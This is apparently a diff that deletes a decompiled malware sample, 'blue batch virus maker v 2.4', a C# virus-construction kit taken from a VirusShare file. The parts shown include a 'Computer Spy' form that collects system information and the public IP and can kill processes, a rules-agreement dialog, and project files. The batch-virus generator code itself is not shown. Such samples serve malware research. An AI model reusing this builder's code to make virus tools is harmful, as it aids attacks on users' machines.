label9_2.Size = size22;
this.Label9.TabIndex = 24;
this.Label9.Text = "Process manager";
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.BackgroundImage = (Image) componentResourceManager.GetObject("$this.BackgroundImage");
this.BackgroundImageLayout = ImageLayout.Stretch;
size1 = new Size(570, 257);
this.ClientSize = size1;
this.ControlBox = false;
this.Controls.Add((Control) this.Label9);
this.Controls.Add((Control) this.Button4);
this.Controls.Add((Control) this.Button3);
this.Controls.Add((Control) this.ListBox1);
this.Controls.Add((Control) this.Label8);
this.Controls.Add((Control) this.Button2);
this.Controls.Add((Control) this.Button1);
this.Controls.Add((Control) this.Label7);
this.Controls.Add((Control) this.TextBox7);
this.Controls.Add((Control) this.TextBox5);
this.Controls.Add((Control) this.TextBox6);
this.Controls.Add((Control) this.Label5);
this.Controls.Add((Control) this.Label6);
this.Controls.Add((Control) this.Label4);
this.Controls.Add((Control) this.Label3);
this.Controls.Add((Control) this.Label2);
this.Controls.Add((Control) this.Label1);
this.Controls.Add((Control) this.TextBox4);
this.Controls.Add((Control) this.TextBox3);
this.Controls.Add((Control) this.TextBox2);
this.Controls.Add((Control) this.TextBox1);
this.Name = nameof (Computer_Spy);
this.ShowIcon = false;
this.StartPosition = FormStartPosition.CenterScreen;
this.Text = "Computer Spy v1.0";
this.ResumeLayout(false);
this.PerformLayout();
}
internal virtual TextBox TextBox1
{
[DebuggerNonUserCode] get => this._TextBox1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox1 = value;
}
internal virtual TextBox TextBox2
{
[DebuggerNonUserCode] get => this._TextBox2;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox2 = value;
}
internal virtual TextBox TextBox3
{
[DebuggerNonUserCode] get => this._TextBox3;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox3 = value;
}
internal virtual TextBox TextBox4
{
[DebuggerNonUserCode] get => this._TextBox4;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox4 = value;
}
internal virtual Label Label1
{
[DebuggerNonUserCode] get => this._Label1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label1 = value;
}
internal virtual Label Label2
{
[DebuggerNonUserCode] get => this._Label2;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label2 = value;
}
internal virtual Label Label3
{
[DebuggerNonUserCode] get => this._Label3;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label3 = value;
}
internal virtual Label Label4
{
[DebuggerNonUserCode] get => this._Label4;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label4 = value;
}
internal virtual System.Windows.Forms.Timer Timer1
{
[DebuggerNonUserCode] get => this._Timer1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer1_Tick);
if (this._Timer1 != null)
this._Timer1.Tick -= eventHandler;
this._Timer1 = value;
if (this._Timer1 == null)
return;
this._Timer1.Tick += eventHandler;
}
}
internal virtual Label Label5
{
[DebuggerNonUserCode] get => this._Label5;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label5 = value;
}
internal virtual Label Label6
{
[DebuggerNonUserCode] get => this._Label6;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label6 = value;
}
internal virtual TextBox TextBox5
{
[DebuggerNonUserCode] get => this._TextBox5;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox5 = value;
}
internal virtual TextBox TextBox6
{
[DebuggerNonUserCode] get => this._TextBox6;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox6 = value;
}
internal virtual TextBox TextBox7
{
[DebuggerNonUserCode] get => this._TextBox7;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox7 = value;
}
internal virtual Label Label7
{
[DebuggerNonUserCode] get => this._Label7;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label7 = value;
}
internal virtual Button Button1
{
[DebuggerNonUserCode] get => this._Button1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button1_Click_1);
if (this._Button1 != null)
this._Button1.Click -= eventHandler;
this._Button1 = value;
if (this._Button1 == null)
return;
this._Button1.Click += eventHandler;
}
}
internal virtual Button Button2
{
[DebuggerNonUserCode] get => this._Button2;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button2_Click);
if (this._Button2 != null)
this._Button2.Click -= eventHandler;
this._Button2 = value;
if (this._Button2 == null)
return;
this._Button2.Click += eventHandler;
}
}
internal virtual Label Label8
{
[DebuggerNonUserCode] get => this._Label8;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label8 = value;
}
internal virtual ListBox ListBox1
{
[DebuggerNonUserCode] get => this._ListBox1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._ListBox1 = value;
}
internal virtual Button Button3
{
[DebuggerNonUserCode] get => this._Button3;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button3_Click);
if (this._Button3 != null)
this._Button3.Click -= eventHandler;
this._Button3 = value;
if (this._Button3 == null)
return;
this._Button3.Click += eventHandler;
}
}
internal virtual Button Button4
{
[DebuggerNonUserCode] get => this._Button4;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button4_Click);
if (this._Button4 != null)
this._Button4.Click -= eventHandler;
this._Button4 = value;
if (this._Button4 == null)
return;
this._Button4.Click += eventHandler;
}
}
internal virtual Label Label9
{
[DebuggerNonUserCode] get => this._Label9;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label9 = value;
}
private void Timer1_Tick(object sender, EventArgs e)
{
this.TextBox1.Text = Conversions.ToString(MyProject.Computer.Info.TotalPhysicalMemory);
this.TextBox2.Text = Conversions.ToString(MyProject.Computer.Info.AvailablePhysicalMemory);
this.TextBox3.Text = Conversions.ToString(MyProject.Computer.Info.TotalVirtualMemory);
this.TextBox4.Text = Conversions.ToString(MyProject.Computer.Info.AvailableVirtualMemory);
this.TextBox5.Text = Conversions.ToString(DateAndTime.TimeOfDay);
this.TextBox6.Text = Environment.MachineName;
}
private void Form1_Load(object sender, EventArgs e)
{
this.TextBox7.Text = new WebClient().DownloadString("http://www.whatismyip.com/automation/n09230945.asp");
this.GetProcesses();
}
private void Button1_Click(object sender, EventArgs e)
{
}
private void Button1_Click_1(object sender, EventArgs e)
{
NetworkInterface[] networkInterfaces = NetworkInterface.GetAllNetworkInterfaces();
int index = 0;
if (index >= networkInterfaces.Length)
return;
NetworkInterface networkInterface = networkInterfaces[index];
int num = (int) Interaction.MsgBox((object) string.Format("The MAC address of {0} is{1}{2}", (object) networkInterface.Description, (object) Environment.NewLine, (object) networkInterface.GetPhysicalAddress()));
}
private void Button2_Click(object sender, EventArgs e)
{
MyProject.Forms.batch_maker.Show();
this.Hide();
}
private void Button3_Click(object sender, EventArgs e) => this.GetProcesses();
private void Button4_Click(object sender, EventArgs e) => this.KillProcess();
public void GetProcesses()
{
this.ListBox1.Items.Clear();
Process[] processes = Process.GetProcesses();
int index = 0;
while (index < processes.Length)
{
this.ListBox1.Items.Add((object) processes[index].ProcessName);
checked { ++index; }
}
}
public void KillProcess()
{
try
{
if (Operators.ConditionalCompareObjectEqual(this.ListBox1.SelectedItem, (object) "", false))
{
int num1 = (int) Interaction.MsgBox((object) "Please Choose a Process", MsgBoxStyle.Critical);
}
else
{
Process[] processes = Process.GetProcesses();
int index = 0;
while (index < processes.Length)
{
Process process = processes[index];
if (Operators.ConditionalCompareObjectEqual((object) process.ProcessName, this.ListBox1.SelectedItem, false))
process.Kill();
checked { ++index; }
}
int num2 = (int) Interaction.MsgBox((object) "Process Killed", MsgBoxStyle.Information);
this.GetProcesses();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
int num = (int) Interaction.MsgBox((object) "FAILED", MsgBoxStyle.Critical);
ProjectData.ClearProjectError();
}
}
}
}

View File

@ -1,67 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Constructor.Win32.BAT.q-08ee2f8c3aa3c7eab228bd2f1b4a63e07fd7671a3929619d4d3486bad87f8200.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{AE998C3A-5348-4270-976F-1C24BA123D36}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>blue batch virus maker v 2.4</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<TargetFrameworkProfile>Client</TargetFrameworkProfile>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<FileAlignment>512</FileAlignment>
<RootNamespace>blue_batch_virus_maker_v_2._4</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml.Linq" />
</ItemGroup>
<ItemGroup>
<Compile Include="batch_maker.cs" />
<Compile Include="Computer_Spy.cs" />
<Compile Include="Form1.cs" />
<Compile Include="Resources.cs" />
<Compile Include="real_batch_virus_s.cs" />
<Compile Include="warning_for_the_hal.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\InternalXmlHelper.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="batch_maker.resx" />
<EmbeddedResource Include="Computer_Spy.resx" />
<EmbeddedResource Include="Form1.resx" />
<EmbeddedResource Include="real_batch_virus_s.resx" />
<EmbeddedResource Include="Resources.resx" />
<EmbeddedResource Include="warning_for_the_hal.resx" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "blue batch virus maker v 2.4", "Constructor.Win32.BAT.q-08ee2f8c3aa3c7eab228bd2f1b4a63e07fd7671a3929619d4d3486bad87f8200.csproj", "{AE998C3A-5348-4270-976F-1C24BA123D36}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{AE998C3A-5348-4270-976F-1C24BA123D36}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{AE998C3A-5348-4270-976F-1C24BA123D36}.Debug|Any CPU.Build.0 = Debug|Any CPU
{AE998C3A-5348-4270-976F-1C24BA123D36}.Release|Any CPU.ActiveCfg = Release|Any CPU
{AE998C3A-5348-4270-976F-1C24BA123D36}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

View File

@ -1,448 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: blue_batch_virus_maker_v_2._4.Form1
// Assembly: blue batch virus maker v 2.4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2DAFA7DD-2FE8-4FC2-9A4A-71538C37F4F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Constructor.Win32.BAT.q-08ee2f8c3aa3c7eab228bd2f1b4a63e07fd7671a3929619d4d3486bad87f8200.exe
using blue_batch_virus_maker_v_2._4.My;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Runtime.CompilerServices;
using System.Windows.Forms;
namespace blue_batch_virus_maker_v_2._4
{
[DesignerGenerated]
public class Form1 : Form
{
private static List<WeakReference> __ENCList = new List<WeakReference>();
private IContainer components;
[AccessedThroughProperty("RichTextBox1")]
private RichTextBox _RichTextBox1;
[AccessedThroughProperty("Button1")]
private Button _Button1;
[AccessedThroughProperty("Button2")]
private Button _Button2;
[AccessedThroughProperty("TextBox1")]
private TextBox _TextBox1;
[AccessedThroughProperty("Label1")]
private Label _Label1;
[AccessedThroughProperty("Label2")]
private Label _Label2;
[AccessedThroughProperty("Label3")]
private Label _Label3;
[AccessedThroughProperty("Label4")]
private Label _Label4;
[DebuggerNonUserCode]
static Form1()
{
}
[DebuggerNonUserCode]
public Form1()
{
this.KeyDown += new KeyEventHandler(this.Form1_KeyDown);
this.Load += new EventHandler(this.Form1_Load);
Form1.__ENCAddToList((object) this);
this.InitializeComponent();
}
[DebuggerNonUserCode]
private static void __ENCAddToList(object value)
{
lock (Form1.__ENCList)
{
if (Form1.__ENCList.Count == Form1.__ENCList.Capacity)
{
int index1 = 0;
int num = checked (Form1.__ENCList.Count - 1);
int index2 = 0;
while (index2 <= num)
{
if (Form1.__ENCList[index2].IsAlive)
{
if (index2 != index1)
Form1.__ENCList[index1] = Form1.__ENCList[index2];
checked { ++index1; }
}
checked { ++index2; }
}
Form1.__ENCList.RemoveRange(index1, checked (Form1.__ENCList.Count - index1));
Form1.__ENCList.Capacity = Form1.__ENCList.Count;
}
Form1.__ENCList.Add(new WeakReference(RuntimeHelpers.GetObjectValue(value)));
}
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof (Form1));
this.RichTextBox1 = new RichTextBox();
this.Button1 = new Button();
this.Button2 = new Button();
this.TextBox1 = new TextBox();
this.Label1 = new Label();
this.Label2 = new Label();
this.Label3 = new Label();
this.Label4 = new Label();
this.SuspendLayout();
this.RichTextBox1.BackColor = SystemColors.WindowFrame;
this.RichTextBox1.ForeColor = Color.Lime;
RichTextBox richTextBox1_1 = this.RichTextBox1;
Point point1 = new Point(12, 8);
Point point2 = point1;
richTextBox1_1.Location = point2;
this.RichTextBox1.Name = "RichTextBox1";
this.RichTextBox1.ReadOnly = true;
RichTextBox richTextBox1_2 = this.RichTextBox1;
Size size1 = new Size(293, 167);
Size size2 = size1;
richTextBox1_2.Size = size2;
this.RichTextBox1.TabIndex = 3;
this.RichTextBox1.Text = componentResourceManager.GetString("RichTextBox1.Text");
this.Button1.BackColor = Color.Lime;
Button button1_1 = this.Button1;
point1 = new Point(199, 220);
Point point3 = point1;
button1_1.Location = point3;
this.Button1.Name = "Button1";
Button button1_2 = this.Button1;
size1 = new Size(118, 40);
Size size3 = size1;
button1_2.Size = size3;
this.Button1.TabIndex = 4;
this.Button1.Text = "Next";
this.Button1.UseVisualStyleBackColor = false;
this.Button1.Visible = false;
this.Button2.BackColor = Color.Red;
Button button2_1 = this.Button2;
point1 = new Point(1, 220);
Point point4 = point1;
button2_1.Location = point4;
this.Button2.Name = "Button2";
Button button2_2 = this.Button2;
size1 = new Size(118, 40);
Size size4 = size1;
button2_2.Size = size4;
this.Button2.TabIndex = 8;
this.Button2.Text = "Leave";
this.Button2.UseVisualStyleBackColor = false;
this.TextBox1.BackColor = Color.Black;
this.TextBox1.ForeColor = Color.Yellow;
TextBox textBox1_1 = this.TextBox1;
point1 = new Point(12, 194);
Point point5 = point1;
textBox1_1.Location = point5;
this.TextBox1.Name = "TextBox1";
TextBox textBox1_2 = this.TextBox1;
size1 = new Size(260, 20);
Size size5 = size1;
textBox1_2.Size = size5;
this.TextBox1.TabIndex = 9;
this.Label1.AutoSize = true;
this.Label1.ForeColor = Color.Lime;
Label label1_1 = this.Label1;
point1 = new Point(177, 178);
Point point6 = point1;
label1_1.Location = point6;
this.Label1.Name = "Label1";
Label label1_2 = this.Label1;
size1 = new Size(98, 13);
Size size6 = size1;
label1_2.Size = size6;
this.Label1.TabIndex = 10;
this.Label1.Text = "You may enter now";
this.Label1.Visible = false;
this.Label2.AutoSize = true;
this.Label2.ForeColor = Color.Red;
Label label2_1 = this.Label2;
point1 = new Point(196, 178);
Point point7 = point1;
label2_1.Location = point7;
this.Label2.Name = "Label2";
Label label2_2 = this.Label2;
size1 = new Size(52, 13);
Size size7 = size1;
label2_2.Size = size7;
this.Label2.TabIndex = 11;
this.Label2.Text = "Try Again";
this.Label2.Visible = false;
this.Label3.AutoSize = true;
this.Label3.BackColor = Color.Black;
this.Label3.ForeColor = Color.Yellow;
Label label3_1 = this.Label3;
point1 = new Point(24, 178);
Point point8 = point1;
label3_1.Location = point8;
this.Label3.Name = "Label3";
Label label3_2 = this.Label3;
size1 = new Size(115, 13);
Size size8 = size1;
label3_2.Size = size8;
this.Label3.TabIndex = 12;
this.Label3.Text = "Do u agree to the rules";
this.Label4.AutoSize = true;
this.Label4.ForeColor = Color.Yellow;
Label label4_1 = this.Label4;
point1 = new Point(278, 197);
Point point9 = point1;
label4_1.Location = point9;
this.Label4.Name = "Label4";
Label label4_2 = this.Label4;
size1 = new Size(27, 13);
Size size9 = size1;
label4_2.Size = size9;
this.Label4.TabIndex = 13;
this.Label4.Text = "I Do";
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.BackColor = Color.Black;
this.BackgroundImage = (Image) componentResourceManager.GetObject("$this.BackgroundImage");
size1 = new Size(317, 259);
this.ClientSize = size1;
this.ControlBox = false;
this.Controls.Add((Control) this.Label4);
this.Controls.Add((Control) this.Label3);
this.Controls.Add((Control) this.Label2);
this.Controls.Add((Control) this.Label1);
this.Controls.Add((Control) this.TextBox1);
this.Controls.Add((Control) this.Button2);
this.Controls.Add((Control) this.Button1);
this.Controls.Add((Control) this.RichTextBox1);
this.Icon = (Icon) componentResourceManager.GetObject("$this.Icon");
this.Name = nameof (Form1);
this.StartPosition = FormStartPosition.CenterScreen;
this.Text = "Warning";
this.ResumeLayout(false);
this.PerformLayout();
}
internal virtual RichTextBox RichTextBox1
{
[DebuggerNonUserCode] get => this._RichTextBox1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.RichTextBox1_TextChanged);
if (this._RichTextBox1 != null)
this._RichTextBox1.TextChanged -= eventHandler;
this._RichTextBox1 = value;
if (this._RichTextBox1 == null)
return;
this._RichTextBox1.TextChanged += eventHandler;
}
}
internal virtual Button Button1
{
[DebuggerNonUserCode] get => this._Button1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button1_Click_1);
if (this._Button1 != null)
this._Button1.Click -= eventHandler;
this._Button1 = value;
if (this._Button1 == null)
return;
this._Button1.Click += eventHandler;
}
}
internal virtual Button Button2
{
[DebuggerNonUserCode] get => this._Button2;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button2_Click_1);
if (this._Button2 != null)
this._Button2.Click -= eventHandler;
this._Button2 = value;
if (this._Button2 == null)
return;
this._Button2.Click += eventHandler;
}
}
internal virtual TextBox TextBox1
{
[DebuggerNonUserCode] get => this._TextBox1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.TextBox1_TextChanged_1);
MouseEventHandler mouseEventHandler = new MouseEventHandler(this.TextBox1_MouseTripleClick);
if (this._TextBox1 != null)
{
this._TextBox1.TextChanged -= eventHandler;
this._TextBox1.MouseDoubleClick -= mouseEventHandler;
}
this._TextBox1 = value;
if (this._TextBox1 == null)
return;
this._TextBox1.TextChanged += eventHandler;
this._TextBox1.MouseDoubleClick += mouseEventHandler;
}
}
internal virtual Label Label1
{
[DebuggerNonUserCode] get => this._Label1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label1 = value;
}
internal virtual Label Label2
{
[DebuggerNonUserCode] get => this._Label2;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label2 = value;
}
internal virtual Label Label3
{
[DebuggerNonUserCode] get => this._Label3;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label3 = value;
}
internal virtual Label Label4
{
[DebuggerNonUserCode] get => this._Label4;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label4 = value;
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
private void Button2_Click(object sender, EventArgs e) => ProjectData.EndApp();
private void TextBox1_TextChanged(object sender, EventArgs e)
{
}
private void Form1_KeyDown(object sender, KeyEventArgs e)
{
}
private void Timer1_Tick(object sender, EventArgs e)
{
}
private void Button1_Click(object sender, EventArgs e)
{
MyProject.Forms.batch_maker.Show();
this.Hide();
}
private void LinkLabel1_LinkClicked(object sender, LinkLabelLinkClickedEventArgs e)
{
}
private void CheckBox1_CheckedChanged(object sender, EventArgs e)
{
}
private void RichTextBox1_TextChanged(object sender, EventArgs e)
{
}
private void RadioButton2_CheckedChanged(object sender, EventArgs e)
{
}
private void RadioButton1_CheckedChanged(object sender, EventArgs e)
{
}
private void Form1_Load(object sender, EventArgs e)
{
}
private void RadioButton1_CheckedChanged_1(object sender, EventArgs e) => this.Button1.Visible = true;
private void RadioButton2_CheckedChanged_1(object sender, EventArgs e) => this.Button1.Visible = false;
private void Button1_Click_1(object sender, EventArgs e)
{
MyProject.Forms.batch_maker.Show();
this.Hide();
}
private void CheckBox1_CheckedChanged_1(object sender, EventArgs e)
{
}
private void CheckBox1_MouseLeave(object sender, EventArgs e)
{
}
private void TextBox1_MouseTripleClick(object sender, MouseEventArgs e)
{
MyProject.Forms.batch_maker.Show();
this.Hide();
}
private void TextBox1_TextChanged_1(object sender, EventArgs e)
{
if (Operators.CompareString(this.TextBox1.Text, "yes", false) == 0)
{
this.Label1.Visible = true;
this.Button1.Visible = true;
this.Label2.Visible = false;
}
else
{
if (Operators.CompareString(this.TextBox1.Text, "Yes", false) == 0)
{
this.Label1.Visible = true;
this.Label2.Visible = false;
this.Button1.Visible = true;
}
if (Operators.CompareString(this.TextBox1.Text, "ye", false) == 0)
{
this.Label2.Visible = true;
this.Label1.Visible = false;
this.Button1.Visible = false;
}
else
{
if (Operators.CompareString(this.TextBox1.Text, "Ye", false) == 0)
{
this.Label2.Visible = false;
this.Label1.Visible = true;
this.Button1.Visible = false;
}
if (Operators.CompareString(this.TextBox1.Text, "y", false) == 0)
{
this.Label1.Visible = false;
this.Label2.Visible = true;
this.Button1.Visible = false;
}
else if (Operators.CompareString(this.TextBox1.Text, "Y", false) == 0)
{
this.Label1.Visible = false;
this.Label1.Visible = true;
this.Button1.Visible = false;
}
}
}
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
private void Button2_Click_1(object sender, EventArgs e) => ProjectData.EndApp();
}
}

View File

@ -1,214 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: blue_batch_virus_maker_v_2._4.My.InternalXmlHelper
// Assembly: blue batch virus maker v 2.4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2DAFA7DD-2FE8-4FC2-9A4A-71538C37F4F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Constructor.Win32.BAT.q-08ee2f8c3aa3c7eab228bd2f1b4a63e07fd7671a3929619d4d3486bad87f8200.exe
using System;
using System.Collections;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Xml.Linq;
namespace blue_batch_virus_maker_v_2._4.My
{
[DebuggerNonUserCode]
[EditorBrowsable(EditorBrowsableState.Never)]
[CompilerGenerated]
internal sealed class InternalXmlHelper
{
[EditorBrowsable(EditorBrowsableState.Never)]
private InternalXmlHelper()
{
}
public static string get_Value(IEnumerable<XElement> source)
{
IEnumerator<XElement> enumerator;
try
{
enumerator = source.GetEnumerator();
if (enumerator.MoveNext())
return enumerator.Current.Value;
}
finally
{
enumerator?.Dispose();
}
return (string) null;
}
public static void set_Value(IEnumerable<XElement> source, string value)
{
IEnumerator<XElement> enumerator;
try
{
enumerator = source.GetEnumerator();
if (!enumerator.MoveNext())
return;
enumerator.Current.Value = value;
}
finally
{
enumerator?.Dispose();
}
}
public static string get_AttributeValue(IEnumerable<XElement> source, XName name)
{
IEnumerator<XElement> enumerator;
try
{
enumerator = source.GetEnumerator();
if (enumerator.MoveNext())
return (string) enumerator.Current.Attribute(name);
}
finally
{
enumerator?.Dispose();
}
return (string) null;
}
public static void set_AttributeValue(IEnumerable<XElement> source, XName name, string value)
{
IEnumerator<XElement> enumerator;
try
{
enumerator = source.GetEnumerator();
if (!enumerator.MoveNext())
return;
enumerator.Current.SetAttributeValue(name, (object) value);
}
finally
{
enumerator?.Dispose();
}
}
public static string get_AttributeValue(XElement source, XName name) => (string) source.Attribute(name);
public static void set_AttributeValue(XElement source, XName name, string value) => source.SetAttributeValue(name, (object) value);
[EditorBrowsable(EditorBrowsableState.Never)]
public static XAttribute CreateAttribute(XName name, object value) => value == null ? (XAttribute) null : new XAttribute(name, RuntimeHelpers.GetObjectValue(value));
[EditorBrowsable(EditorBrowsableState.Never)]
public static XAttribute CreateNamespaceAttribute(XName name, XNamespace ns)
{
XAttribute namespaceAttribute = new XAttribute(name, (object) ns.NamespaceName);
namespaceAttribute.AddAnnotation((object) ns);
return namespaceAttribute;
}
[EditorBrowsable(EditorBrowsableState.Never)]
public static object RemoveNamespaceAttributes(
string[] inScopePrefixes,
XNamespace[] inScopeNs,
List<XAttribute> attributes,
object obj)
{
switch (obj)
{
case XElement e:
// ISSUE: reference to a compiler-generated method
return (object) InternalXmlHelper.RemoveNamespaceAttributes(inScopePrefixes, inScopeNs, attributes, e);
case IEnumerable enumerable:
// ISSUE: reference to a compiler-generated method
return (object) InternalXmlHelper.RemoveNamespaceAttributes(inScopePrefixes, inScopeNs, attributes, enumerable);
default:
return obj;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
public static IEnumerable RemoveNamespaceAttributes(
string[] inScopePrefixes,
XNamespace[] inScopeNs,
List<XAttribute> attributes,
IEnumerable obj)
{
if (obj == null)
return obj;
// ISSUE: object of a compiler-generated type is created
// ISSUE: reference to a compiler-generated method
// ISSUE: object of a compiler-generated type is created
// ISSUE: reference to a compiler-generated method
return obj is IEnumerable<XElement> source ? (IEnumerable) source.Select<XElement, XElement>(new Func<XElement, XElement>(new InternalXmlHelper.RemoveNamespaceAttributesClosure(inScopePrefixes, inScopeNs, attributes).ProcessXElement)) : (IEnumerable) obj.Cast<object>().Select<object, object>(new Func<object, object>(new InternalXmlHelper.RemoveNamespaceAttributesClosure(inScopePrefixes, inScopeNs, attributes).ProcessObject));
}
[EditorBrowsable(EditorBrowsableState.Never)]
public static XElement RemoveNamespaceAttributes(
string[] inScopePrefixes,
XNamespace[] inScopeNs,
List<XAttribute> attributes,
XElement e)
{
XAttribute nextAttribute;
if (e != null)
{
for (XAttribute xattribute = e.FirstAttribute; xattribute != null; xattribute = nextAttribute)
{
nextAttribute = xattribute.NextAttribute;
if (xattribute.IsNamespaceDeclaration)
{
XNamespace xnamespace1 = xattribute.Annotation<XNamespace>();
string localName1 = xattribute.Name.LocalName;
if ((object) xnamespace1 != null)
{
if (inScopePrefixes != null && inScopeNs != null)
{
int num = checked (inScopePrefixes.Length - 1);
int index = 0;
while (index <= num)
{
string inScopePrefix = inScopePrefixes[index];
XNamespace inScopeN = inScopeNs[index];
if (localName1.Equals(inScopePrefix))
{
if (xnamespace1 == inScopeN)
xattribute.Remove();
xattribute = (XAttribute) null;
break;
}
checked { ++index; }
}
}
if (xattribute != null)
{
if (attributes != null)
{
int num = checked (attributes.Count - 1);
int index = 0;
while (index <= num)
{
XAttribute attribute = attributes[index];
string localName2 = attribute.Name.LocalName;
XNamespace xnamespace2 = attribute.Annotation<XNamespace>();
if ((object) xnamespace2 != null && localName1.Equals(localName2))
{
if (xnamespace1 == xnamespace2)
xattribute.Remove();
